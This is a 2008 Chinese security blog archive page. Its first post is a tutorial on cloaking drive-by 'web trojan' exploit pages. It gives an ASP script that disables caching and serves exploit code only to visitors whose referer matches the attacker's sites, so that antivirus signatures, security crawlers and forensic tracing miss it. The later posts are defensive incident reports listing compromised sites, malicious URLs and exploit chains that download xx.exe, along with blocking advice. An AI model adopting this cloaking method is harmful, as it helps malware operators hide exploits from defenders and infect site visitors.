This theme is downloaded from wordpress themes website.

Archive for May, 2008

网马躯干

Author: Greysign

2008-5-23

http://www.scanw.com/blog

余弦不久之前写了网马中枢,是关于服务端应用的一小角,他还说有其他更复杂的应用,一直等着他的BLOG更新,还是未见他写出来。最近大家都很忙。

关于网马代码,exploit固然重要,但除了exploit之外的网马框架加强对于网马功能扩展也是必然的发展趋势。网马中枢里面用了include ,读取文件等方式来隐藏EXP的地址,不过,EXP代码完全暴露出来了,那就无法阻止代码被剽窃,被取证等行为。

我已经很久没有写点什么了,就放一点服务端技术的应用和小注释吧。不是什么新技术,只是实现一些在现实中比较实用的东西,大牛赶紧飘过。

我们已经有了网马中枢了,那么,如何来隐藏我们的EXP代码以及地址呢?哈哈。这不难。跟着我的思路吧。

——————华丽地分割——————–

利用网马中枢提到的include ,读取文件这2个方式,已经可以隐藏了地址,在最后调用的HTM(last_trojan.html)写入以下代码:

document.write(”<script src=http://www.scanw.com/blog/done.asp></script>”);

/*继续调用一个JS文件*/

在done.asp里写入以下代码:

<%
Response.Buffer   =   True    
Response.ExpiresAbsolute   =   Now()   -   1    
Response.Expires   =   0    
Response.CacheControl   =   “no-cache”    
Response.AddHeader   “Pragma”,   “No-Cache”
Dim hr
hr=Request.ServerVariables(”HTTP_REFERER”)
If InStr(hr,”greysign”) > 0 or InStr(hr,”scanw”) > 0 Then
%>
alert(’aaa’)
<%
End If
%>

这个代码的作用是:打开缓存,将页面设置为立即过期,Now()   -   1设置不留缓存文件,这样可以在用户点后退的时候没有缓存文件可以查看,变成直接的HTTP请求,然后获取HTTP_REFERER,判断HTTP_REFERER来源玉米是否带有我们的字符串(即判断来源网站是否是我们的网站),假如包含字符串,就执行alert(’aaa’),假如不包含(不是来自我们的网站的连接请求),那么就什么都不返回执行。

结合以上的所有手段,我们就实现了地址隐藏和代码隐藏了。

什么?代码哪里隐藏了?

你可以查看下原代码。只留下了调用done.asp的痕迹,你直接打开done.asp是无法看到代码的。缓存文件也没留下,杀软们去比对特征码吧……

当然了。这个只是功能的演示和思路的扩展,你可以利用几个玉米跳来跳去,把自己藏着深深地,让安全公司的爬虫抓不到你,除非他们一直把referer记着,不断地深入追踪你。不然他们只追到其中某几级的地址就咯屁了,而且很多时候他们只有挂马页的地址,更不用说前几级的referer是从哪个星球来的。

到了这里大家应该清楚了吧。跟ITSUN用PHP实现的隐蔽有点相似,但它还是留下了缓存给我取证。

大家有兴趣就加上cookies判断等东西,打造无敌躯干。没缓存文件对比特征,爬虫抓不到你,手工追踪狡兔三窟,cookies判断虚实不定……好吧,你说你用影音嗅探非把我的地址给揪出来。不过那是不可能的。

这样的迷踪步,我都没有把握能捕获到EXP。特别是我可不会为了一个挂马地址花上大把的时间去追踪,我又不是金田一……

所以以后拿到EXP直接往done.asp的判断里丢,有兴趣的还可以加个密免个杀变个型整个容炒个作唬个烂上个镜出个名。

不知不觉我边聊QQ边写的文章又开始唬烂了……都忘记该写什么了。好吧。。大家看演示页打包吧:

http://www.scanw.com/ggtest/demo.rar

在此先讲2件事,有人叫我大G或者G大,其实这中间有误会,我叫小G,而大G和G大的叫法应该是大GG和GG大演变来的。

更多关于网马的内容请关注知道安全

Popularity: 12% [?]

Web2.0 Security GreySign 23 May 2008 No Comments

5月23日挂马简报

大学生创业联盟(hXXp://www.18cy.com/)被插入恶意代码:hXXp://%76%63%63%64%2E%63%6E

Popularity: 6% [?]

网站挂马记录 GreySign 23 May 2008 No Comments

5月22日挂马简报

飞速免费电影站(hXXp://www.haomn.com)被插入恶意代码:

hXXp://viptongji.cn/tj.htm

Popularity: 6% [?]

网站挂马记录 GreySign 22 May 2008 No Comments

5月21日挂马简报

微客网(hXXp://www.webkey.cn/soft/soft_16/file_1412.html)被插入恶意代码:

hXXp://www.cieccoo.com/css/js/mm.htm

hXXp://www.88ou.cn/ip/1.htm

Popularity: 6% [?]

网站挂马记录 GreySign 21 May 2008 No Comments

硅谷动力被插入恶意代码

发布日期:2008-5-20
最后更新日期:2008-5-20   1237GMT

来自:知道安全


Mal_URL :  hXXp://games.enet.com.cn/article/A6320051127002.html

情况:
该地址被黑客插入恶意代码连接(hXXp://d.godaand.cn/bao/p69.htm),访客在访问过程中可能会遭受到包含REAL漏洞,MS06014,暴风影音漏洞,联众世界漏洞,讯雷漏洞的网页ActiveX攻击。
该恶意地址企图通过以下漏洞下载病毒:

[wide]http://d.godaand.cn/bao/p69.htm
    [frame]http://d.godaand.cn/14.htm
         [object]http://ccc.52gol.com/xx.exe [06014]
    [frame]http://d.godaand.cn/real.htm
         [object]http://ccc.52gol.com/xx.exe[REAL]
    [frame]http://d.godaand.cn/real11.htm
         [object]http://ccc.52gol.com/xx.exe[REAL]
    [frame]http://d.godaand.cn/lz.htm
         [object]http://ccc.52gol.com/xx.exe[联众]
    [frame]http://d.godaand.cn/bfyy.htm
         [object]http://ccc.52gol.com/xx.exe[暴风]
    [frame]http://d.godaand.cn/bao/xl.htm
         [object]http://ccc.52gol.com/xx.exe[讯雷]

推荐的应对方法:

在你的电脑里将ccc.52gol.com,d.godaand.cn添加到HOSTS文件进行屏蔽。

安装365门神(WESEC)软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://www.scanw.com/

Popularity: 16% [?]

Default GreySign 20 May 2008 No Comments

5月20日挂马简报

兴安在线(hXXp://www.xingan.net/)被插入恶意代码:hXXp://count24.51yes.biz/goldip.htm?045

Popularity: 5% [?]

网站挂马记录 GreySign 20 May 2008 No Comments

5月19日挂马简报

中国离心机网(hXXp://www.chinalxj.net/sca_view.asp?id=6998)被插入恶意代码:

hXXp://ca.winvv.com/cn.htm

Popularity: 5% [?]

网站挂马记录 GreySign 19 May 2008 No Comments

Mass iframe injection: s.see9.us/s.js

 发布日期:2008-5-18
最后更新日期:2008-5-18   1937GMT

来自:
知道安全
 

Mal_URL :  s.see9.us/s.js
 

情况:该恶意地址在中国被篡改的网站里以Iframe的形式被添加进页面代码里,访客在访问过程中可能会遭受到包含REAL漏洞,MS06014,暴风影音漏洞,联众世界漏洞,PPS网络电视漏洞,百度搜霸漏洞的网页的ActiveX攻击。

该恶意地址企图通过以上漏洞下载病毒并执行。

GOOGLE中记录被插入该恶意代码的网站超过90000个。

推荐的应对方法:

在你的电脑里将s.see9.us添加到HOSTS文件进行屏蔽。

安装365门神(WESEC)软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://www.scanw.com/

 

Popularity: 6% [?]

网站挂马记录 GreySign 18 May 2008 No Comments

KAV6.0误杀系统文件wininet.dll

发布日期:2008-5-18

最后更新日期:2008-5-18   1137GMT

KAV6.0误杀了系统文件wininet.dll,将其报为病毒:Trojan.Win32.Agent.mue,假如用户选择清除该病毒,会导致系统无法启动。请KAV6.0的用户等待官方更新病毒库并且不要删除该文件。已经删除该文件的用户,可用系统盘引导进入DOS下修复该文件。

Popularity: 18% [?]

Default GreySign 18 May 2008 No Comments

5月18日挂马简报

中国电子地图网(hXXp://www.joinmap.com/)被插入恶意代码:

hXXp://www.52lzz.com.cn/2.js

Popularity: 5% [?]

网站挂马记录 GreySign 18 May 2008 No Comments

« Previous PageNext Page »

Recommended: Buy movies online.